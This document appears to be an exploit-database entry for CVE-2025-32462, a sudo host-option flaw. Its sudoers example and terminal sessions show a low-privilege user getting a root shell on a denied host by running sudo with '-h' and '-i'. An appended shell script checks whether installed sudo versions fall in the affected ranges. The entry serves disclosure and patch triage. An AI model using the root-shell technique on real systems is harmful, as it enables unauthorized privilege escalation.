# Exploit Title: Sudo 1.9.17 Host Option - Elevation of Privilege
# Date: 2025-06-30
# Exploit Author: Rich Mirch
# Vendor Homepage: https://www.sudo.ws
# Software Link: https://www.sudo.ws/dist/sudo-1.9.17.tar.gz
# Version: Stable 1.9.0 - 1.9.17, Legacy 1.8.8 - 1.8.32
# Fixed in: 1.9.17p1
# Vendor Advisory: https://www.sudo.ws/security/advisories/host_any
# Blog: https://www.stratascale.com/vulnerability-alert-CVE-2025-32462-sudo-host
# Tested on: Ubuntu 24.04.1; Sudo 1.9.15p5, macOS Sequoia 15.3.2; Sudo 1.9.13p2
# CVE : CVE-2025-32462

# No exploit is required.

Executing a sudo or sudoedit command with the host option referencing an unrelated remote host rule causes Sudo to treat the rule as valid for the local system. As a result, any command allowed by the remote host rule can be executed on the local machine.

Example /etc/sudoers file using the Host_Alias directive. The lowpriv user is allowed to execute all commands (full root) on dev.test.local and ci.test.local, but not on prod.test.local.

Host_Alias SERVERS = prod.test.local, dev.test.local
Host_Alias PROD = prod.test.local

lowpriv SERVERS, !PROD = NOPASSWD:ALL
lowpriv ci.test.local = NOPASSWD:ALL

Even though the prod.test.local server is explicitly denied for the lowpriv user, root access is achieved by specifying the host option for the dev.test.local or ci.test.local servers.

Example: show that lowpriv is not allowed to execute sudo on the prod server.

lowpriv@prod:~$ id
uid=1001(lowpriv) gid=1001(lowpriv) groups=1001(lowpriv)
lowpriv@prod:~$ sudo -l
[sudo] password for lowpriv:
Sorry, user lowpriv may not run sudo on prod.

List the host rules for the dev.test.local server.

lowpriv@prod:~$ sudo -l -h dev.test.local
Matching Defaults entries for lowpriv on dev:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin,
    use_pty

User lowpriv may run the following commands on dev:
    (root) NOPASSWD: ALL

Execute a root shell on prod.test.local by specifying the -h dev.test.local option.

lowpriv@prod:~$ sudo -h dev.test.local -i
sudo: a remote host may only be specified when listing privileges.
root@prod:~# id
uid=0(root) gid=0(root) groups=0(root)
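An added example, not part of the advisory: a POSIX shell script that classifies a sudo version string against the affected ranges stated in the header (stable 1.9.0 through 1.9.17, legacy 1.8.8 through 1.8.32, with 1.9.17p1 fixed), so an administrator can triage a fleet for CVE-2025-32462 before reviewing sudoers files for host-specific rules. The function names and the `--check-installed` flag are my own; the affected ranges are taken from the advisory above.

```shell
#!/bin/sh
# Added example (not from the advisory): decide whether a sudo version string
# falls inside the ranges listed as affected by CVE-2025-32462.
# Ranges assumed from the advisory header:
#   stable 1.9.0 - 1.9.17 (fixed in 1.9.17p1), legacy 1.8.8 - 1.8.32.

# Split "MAJOR.MINOR.MICROpN" into four numeric fields; a missing
# patchlevel ("p" suffix) or micro field is reported as 0.
sudo_version_fields() {
    ver=$1
    base=${ver%%p*}                    # "1.9.17p1" -> "1.9.17"
    case $ver in
        *p*) plevel=${ver##*p} ;;      # "1.9.17p1" -> "1"
        *)   plevel=0 ;;
    esac
    major=${base%%.*}
    rest=${base#*.}
    minor=${rest%%.*}
    micro=${rest#*.}
    [ "$micro" = "$rest" ] && micro=0  # "1.9" carries no micro field
    echo "$major $minor $micro $plevel"
}

# Exit status 0 when the version is in an affected range, 1 otherwise.
sudo_version_affected() {
    set -- $(sudo_version_fields "$1")
    major=$1; minor=$2; micro=$3; plevel=$4
    [ "$major" -eq 1 ] || return 1
    case $minor in
        9)
            # 1.9.0 through 1.9.17 are affected; 1.9.17p1 and later are fixed.
            if [ "$micro" -lt 17 ]; then return 0; fi
            if [ "$micro" -eq 17 ] && [ "$plevel" -eq 0 ]; then return 0; fi
            return 1 ;;
        8)
            # 1.8.8 through 1.8.32 are affected at any patchlevel.
            if [ "$micro" -ge 8 ] && [ "$micro" -le 32 ]; then return 0; fi
            return 1 ;;
        *)
            return 1 ;;
    esac
}

# First line of "sudo --version" reads "Sudo version X"; field 3 is X.
installed_sudo_version() {
    sudo --version 2>/dev/null | awk 'NR==1 {print $3}'
}

# Usage: sh check_sudo_host_cve.sh --check-installed
if [ "${1:-}" = "--check-installed" ]; then
    v=$(installed_sudo_version)
    if sudo_version_affected "$v"; then
        echo "sudo $v is in an affected range for CVE-2025-32462; upgrade to 1.9.17p1 or later"
    else
        echo "sudo $v is not in an affected range for CVE-2025-32462"
    fi
fi
```

A version match is only the first triage step: the sudoers rules themselves decide whether a host-scoped grant exists that a local user could borrow, so hosts reported as affected should have their `Host_Alias` and per-host entries reviewed as well.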